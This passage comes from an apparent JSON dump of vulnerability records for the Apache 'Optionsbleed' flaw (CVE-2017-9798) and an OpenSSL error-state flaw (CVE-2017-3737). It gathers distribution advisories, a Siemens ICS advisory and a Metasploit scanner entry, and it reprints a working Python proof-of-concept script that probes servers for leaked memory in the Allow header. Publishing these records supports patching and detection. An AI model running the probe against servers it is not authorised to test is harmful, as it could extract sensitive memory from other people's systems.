httpd-2.4.27-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n1a8faf0343d8a1e06e2a6102d3a09e84 httpd-2.4.27-x86_64-2_slack14.1.txz\n\nSlackware 14.2 package:\n65704345c6deb52ba079f661a12e7e1e httpd-2.4.27-i586-2_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n16147809df94a27bff1aad4505ae5b7c httpd-2.4.27-x86_64-2_slack14.2.txz\n\nSlackware -current package:\ncc34f27a9928ce108cae65dc1db6282e n/httpd-2.4.27-i586-3.txz\n\nSlackware x86_64 -current package:\n84d2b395649953f128679fb969c19d66 n/httpd-2.4.27-x86_64-3.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.27-i586-2_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2017-09-18T19:20:15", "published": "2017-09-18T19:20:15", "id": "SSA-2017-261-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.551634", "type": "slackware", "title": "[slackware-security] httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T01:06:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3980-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 20, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nCVE ID : CVE-2017-9798\nDebian Bug : 876109\n\nHanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 2.4.10-10+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2.4.25-3+deb9u3.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 14, "modified": "2017-09-20T09:20:44", "published": "2017-09-20T09:20:44", "id": "DEBIAN:DSA-3980-1:C7ED3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00242.html", "title": "[SECURITY] [DSA 3980-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:21:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "Package : apache2\nVersion : 2.2.22-13+deb7u12\nCVE ID : CVE-2017-9798\nDebian Bug : 876109\n\nHanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-21T20:42:38", "published": "2017-09-21T20:42:38", "id": "DEBIAN:DLA-1102-1:7F277", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00019.html", "title": "[SECURITY] [DLA 1102-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "USN-3425-1 fixed a vulnerability in Apache HTTP Server. This update \nprovides the corresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nHanno B\u00f6ck discovered that the Apache HTTP Server incorrectly handled \nLimit directives in .htaccess files. In certain configurations, a remote \nattacker could possibly use this issue to read arbitrary server memory, \nincluding sensitive information. This issue is known as Optionsbleed.", "edition": 6, "modified": "2017-10-24T00:00:00", "published": "2017-10-24T00:00:00", "id": "USN-3425-2", "href": "https://ubuntu.com/security/notices/USN-3425-2", "title": "Apache HTTP Server vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-02T11:44:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "Hanno B\u00f6ck discovered that the Apache HTTP Server incorrectly handled \nLimit directives in .htaccess files. In certain configurations, a remote \nattacker could possibly use this issue to read arbitrary server memory, \nincluding sensitive information. This issue is known as Optionsbleed.", "edition": 5, "modified": "2017-09-19T00:00:00", "published": "2017-09-19T00:00:00", "id": "USN-3425-1", "href": "https://ubuntu.com/security/notices/USN-3425-1", "title": "Apache HTTP Server vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "Arch Linux Security Advisory ASA-201709-15\n==========================================\n\nSeverity: High\nDate : 2017-09-18\nCVE-ID : CVE-2017-9798\nPackage : apache\nType : information disclosure\nRemote : Yes\nLink : https://security.archlinux.org/AVG-404\n\nSummary\n=======\n\nThe package apache before version 2.4.27-2 is vulnerable to information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 2.4.27-2.\n\n# pacman -Syu \"apache>=2.4.27-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nAn use after free vulnerability has been discovered in Apache HTTP\n2.4.27 that causes a corrupted Allow header to be constructed in\nresponse to HTTP OPTIONS requests. This can leak pieces of arbitrary\nmemory from the server process that may contain secrets. The memory\npieces change after multiple requests, so for a vulnerable host an\narbitrary number of memory chunks can be leaked.\nThe bug appears if a webmaster tries to use the \"Limit\" directive with\nan invalid HTTP method.\n\nImpact\n======\n\nA remote attacker is able to leak memory and potentially obtain\nsensitive information from the server process.\n\nReferences\n==========\n\nhttps://bz.apache.org/bugzilla/show_bug.cgi?id=61207\nhttps://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/server/core.c?r1=1805223&r2=1807754&pathrev=1807754&view=patch\nhttp://www.openwall.com/lists/oss-security/2017/09/18/2\nhttps://github.com/hannob/optionsbleed\nhttps://security.archlinux.org/CVE-2017-9798", "modified": "2017-09-18T00:00:00", "published": "2017-09-18T00:00:00", "id": "ASA-201709-15", "href": "https://security.archlinux.org/ASA-201709-15", "type": "archlinux", "title": "[ASA-201709-15] apache: information disclosure", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "centos": [{"lastseen": "2020-12-08T03:34:32", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2882\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-October/034603.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ldap\nmod_proxy_html\nmod_session\nmod_ssl\n\n**Upstream details at:**\n", "edition": 4, "modified": "2017-10-11T20:46:20", "published": "2017-10-11T20:46:20", "href": "http://lists.centos.org/pipermail/centos-announce/2017-October/034603.html", "id": "CESA-2017:2882", "title": "httpd, mod_ldap, mod_proxy_html, mod_session, mod_ssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-04-01T18:37:30", "description": "Exploit for linux platform in category web applications", "edition": 1, "published": "2017-09-18T00:00:00", "title": "Apache - HTTP OPTIONS Memory Leak Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-18T00:00:00", "href": "https://0day.today/exploit/description/28573", "id": "1337DAY-ID-28573", "sourceData": "#!/usr/bin/env python3\r\n \r\n# Optionsbleed proof of concept test\r\n# by Hanno B\u00f6ck\r\n \r\nimport argparse\r\nimport urllib3\r\nimport re\r\n \r\n \r\ndef test_bleed(url, args):\r\n r = pool.request('OPTIONS', url)\r\n try:\r\n allow = str(r.headers[\"Allow\"])\r\n except KeyError:\r\n return False\r\n if allow in dup:\r\n return\r\n dup.append(allow)\r\n if allow == \"\":\r\n print(\"[empty] %s\" % (url))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\r\n z = [x.strip() for x in allow.split(',')]\r\n if len(z) > len(set(z)):\r\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\r\n elif args.all:\r\n print(\"[ok] %s: %s\" % (url, repr(allow)))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$\", allow):\r\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\r\n else:\r\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\r\n return True\r\n \r\n \r\nparser = argparse.ArgumentParser(\r\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\r\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\r\n \"Autmatically checks http://, https://, http://www. and https://www. -\\n\"\r\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\r\n \"Explanation of results:\\n\"\r\n \"[bleed] corrupted header found, vulnerable\\n\"\r\n \"[empty] empty allow header, does not make sense\\n\"\r\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\r\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\r\n \"[ok] normal list found (only shown with -a/--all)\\n\",\r\n formatter_class=argparse.RawTextHelpFormatter)\r\nparser.add_argument('hosttocheck', action='store',\r\n help='The hostname you want to test against')\r\nparser.add_argument('-n', nargs=1, type=int, default=[10],\r\n help='number of tests (default 10)')\r\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\r\n help=\"show headers from hosts without problems\")\r\nparser.add_argument(\"-u\", \"--url\", action='store_true',\r\n help=\"pass URL instead of hostname\")\r\nargs = parser.parse_args()\r\nhowoften = int(args.n[0])\r\n \r\ndup = []\r\n \r\n# Note: This disables warnings about the lack of certificate verification.\r\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\r\n# even if they are shipped with invalid certificates.\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n \r\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\r\n \r\nif args.url:\r\n test_bleed(args.hosttocheck, args)\r\nelse:\r\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\r\n for i in range(howoften):\r\n try:\r\n if test_bleed(prefix+args.hosttocheck, args) is False:\r\n break\r\n except Exception as e:\r\n pass\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/28573"}], "metasploit": [{"lastseen": "2020-10-15T10:21:26", "description": "This module scans for the Apache optionsbleed vulnerability where the Allow response header returned from an OPTIONS request may bleed memory if the server has a .htaccess file with an invalid Limit method defined.\n", "published": "2017-09-27T02:09:07", "type": "metasploit", "title": "Apache Optionsbleed Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED", "href": "", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_optionsbleed.rb"}], "openssl": [{"lastseen": "2020-09-14T11:36:05", "bulletinFamily": "software", "cvelist": ["CVE-2017-3737"], "description": " OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an \"error state\" mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. Reported by David Benjamin (Google). \n\n * Fixed in OpenSSL 1.0.2n [(git commit)](<https://github.com/openssl/openssl/commit/898fb884b706aaeb283de4812340bb0bde8476dc>) (Affected 1.0.2b-1.0.2m)\n", "edition": 1, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENSSL:CVE-2017-3737", "href": "https://www.openssl.org/news/secadv/20171207.txt", "title": "Vulnerability in OpenSSL - Read/write after SSL object in error state ", "type": "openssl", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "ics": [{"lastseen": "2020-12-18T03:21:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-3737"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 5.9**\n\n * **ATTENTION**: Exploitable remotely\n * **Vendor**: Siemens\n * **Equipment**: Industrial Products\n * **Vulnerability**: Cleartext Transmission of Sensitive Information\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the updated advisory titled ICSA-18-226-02 Siemens OpenSSL Vulnerability in Industrial Products (Update D) that was published February 12, 2019, on the NCCIC/ICS-CERT website.\n\n## 3\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could result in unencrypted data being transmitted by the SSL/TLS record layer.\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nSiemens reports that the vulnerability affects the following industrial products:\n\n * MindConnect IoT2040: All versions prior to v03.01\n * MindConnect Nano (IPC227D): All versions prior to v03.01\n * SIMATIC ET 200SP Open Controller CPU 1515SP PC: All versions prior to v2.1.6\n * SIMATIC HMI WinCC Flexible: All versions prior to v15.1\n * SIMATIC IPC DiagMonitor: All versions prior to v5.0.3\n\n** \\--------- Begin Update E Part 1 of 4 ---------**\n\n * SIMATIC IPC DiagBase: All versions prior to v2.1.1.0 \n\n**\\--------- End Update E Part 1 of 4 ---------**\n\n * SIMATIC S7-1200: All versions prior to v4.2.3\n * SIMATIC STEP 7 (TIA Portal) v13: All versions prior to v13 SP2 Update 2\n * SIMATIC STEP 7 (TIA Portal) v14: All versions\n * SIMATIC STEP 7 (TIA Portal) v15: All versions prior to v15 SP2 Update 2\n * SIMATIC WinCC (TIA Portal) v13: All versions prior to v13 SP2 Update 2\n\n**\\--------- Begin Update E Part 2 of 4 ---------**\n\n * SIMATIC WinCC (TIA Portal) v14: All versions prior to v14 SP1 Update 6\n\n**\\--------- End Update E Part 2 of 4 ---------**\n\n * SIMATIC WinCC (TIA Portal) v15: All versions prior to v15 SP2 Update 2\n * SIMATIC S7-1500: All versions prior to v2.5.2\n * SIMATIC S7-1500 Software Controller: All versions prior to v2.6\n * SIMATIC WinCC OA v3.14: All versions\n * SIMATIC WinCC OA v3.15: All versions\n * SIMATIC WinCC OA v3.16: All versions\n * SINUMERIK Integrate Access MyMachine service engineer client as part of Sinumerik Integrate Product suite: All versions prior to and including v4.1.7, and\n * SINUMERIK Integrate Operate Client as part of Sinumerik Integrate Product suite: All versions prior to and including v2.0.11 / v3.0.11\n\n### 4.2 VULNERABILITY OVERVIEW\n\n**4.2.1 [CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION CWE-319](<https://cwe.mitre.org/data/definitions/319.html>)**\n\nIn OpenSSL 1.0.2 an \u201cerror state\u201d mechanism was introduced. This \u201cerror state\u201d mechanism does not work correctly if SSL_read() or SSL_write() is called directly by an application. This could result in data being sent out unencrypted by the SSL/TLS record layer. \n \nSuccessful exploitation requires an attacker to cause a fatal error in the targeted SSL/TLS handshake algorithm, and that the targeted application calls SSL_read() or SSL_write() only after receiving the fatal error. No user interaction or privileges are required to exploit this security vulnerability. The vulnerability could allow a compromise of data confidentiality by transmitting it unencrypted over the network. \n \n[CVE-2017-3737](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3737>) has been assigned to this vulnerability. A CVSS v3 base score of 5.9 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS**: Chemical, Critical Manufacturing, Energy, Food and Agriculture, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED**: Worldwide\n * **COMPANY HEADQUARTERS LOCATION**: Germany\n\n### 4.4 RESEARCHER\n\nSiemens reported this vulnerability to NCCIC.\n\n## 5\\. MITIGATIONS\n\nSiemens has provided updates for the following products to fix the vulnerability:\n\n * MindConnect IoT2040: Install v03.01 or newer via Mindsphere web front-end\n * MindConnect Nano (IPC227D): Install v03.01 or newer via Mindsphere web front-end\n * SIMATIC ET 200SP Open Controller CPU 1515SP PC: Update to v2.1.6\n\n<https://support.industry.siemens.com/cs/us/en/view/109759122>\n\n * SIMATIC HMI WinCC Flexible: Update to v15.1\n\n<https://support.industry.siemens.com/cs/us/en/view/109758794>\n\n * SIMATIC IPC DiagMonitor: Update to v5.0.3\n\nContact customer support to obtain the update\n\n**\\--------- Begin Update E Part 3 of 4 ---------**\n\n * SIMATIC IPC DiagBase: Update to version v2.1.1.0\n\n<https://support.industry.siemens.com/cs/ww/en/view/29316343>\n\n**\\--------- End Update E Part 3 of 4 ---------**\n\n * SIMATIC S7-1500: Update to v2.5.2\n\n<https://support.industry.siemens.com/cs/ww/en/view/109478459>\n\n * SIMATIC S7-1500 Software Controller: Update to v2.6\n\n<https://support.industry.siemens.com/cs/us/en/view/109478528>\n\n * SIMATIC STEP 7 (TIA Portal) v13 and WinCC (TIA Portal) v13: Update to v13 Update 2 or newer\n\n<https://support.industry.siemens.com/cs/ww/en/view/109759753>\n\n**\\--------- Begin Update E Part 4 of 4 ---------**\n\nSIMATIC WinCC (TIA Portal) v14: Update to v14 SP1 Update 6,\n\n<https://support.industry.siemens.com/cs/ww/en/view/109747387>\n\n**\\--------- End Update E Part 4 of 4 ---------**\n\n * SIMATIC STEP 7 (TIA Portal) v15 and WinCC (TIA Portal) v15: Update to v15 Update 2 or newer\n\n<https://support.industry.siemens.com/cs/ww/en/view/109755826>\n\n * SIMATIC S7-1200: Update to v4.2.3 \n\n<https://support.industry.siemens.com/cs/ww/en/view/109741461>\n\n * SIMATIC WinCC OA V3.14: Update to v3.14-P021\n\n * SIMATIC WinCC OA V3.15: Update to v3.15-P014\n\n * SIMATIC WinCC OA V3.16: Update to v3.16-P002\n\n[https://portal.etm.at/index.php?option=com_ content&amp;view=category&amp;id=67&amp;layout=blog&amp; Itemid=80](<https://portal.etm.at/index.php?option=com_%20content&view=category&id=67&layout=blog&%20Itemid=80>)\n\n * SINUMERIK Integrate Access MyMachine service engineer client as part of Sinumerik Integrate Product suite: Update to v4.1.8\n * SINUMERIK Integrate Operate Client as part of Sinumerik Integrate Product suite: Update to v2.0.12 / v3.0.12\n\nSiemens has identified the following specific workarounds and mitigations users can apply to reduce the risk:\n\n * S7-1200: Disable web server within the device configuration if it is not used, or limit access to the web server on a particular Ethernet/PROFINET port/interface if possible (setting is under General /Web server access).\n\nAs a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens\u2019 operational guidelines for Industrial Security (Download: <https://www.siemens.com/cert/operational-guidelines-industrial-security>), following the recommendations in the product manuals. \n \nAdditional information on Industrial Security by Siemens can be found at:\n\n<https://www.siemens.com/industrialsecurity> \n \nFor more information on this vulnerability and associated software updates, please see Siemens security advisory SSA-179516 on their website: \n \n<https://www.siemens.com/cert/advisories>\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability. High skill level is needed to exploit.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-226-02>); we'd welcome your feedback.\n", "edition": 23, "modified": "2019-04-09T00:00:00", "published": "2018-08-14T00:00:00", "id": "ICSA-18-226-02", "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-226-02", "title": "Siemens OpenSSL Vulnerability in Industrial Products (Update E)", "type": "ics", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}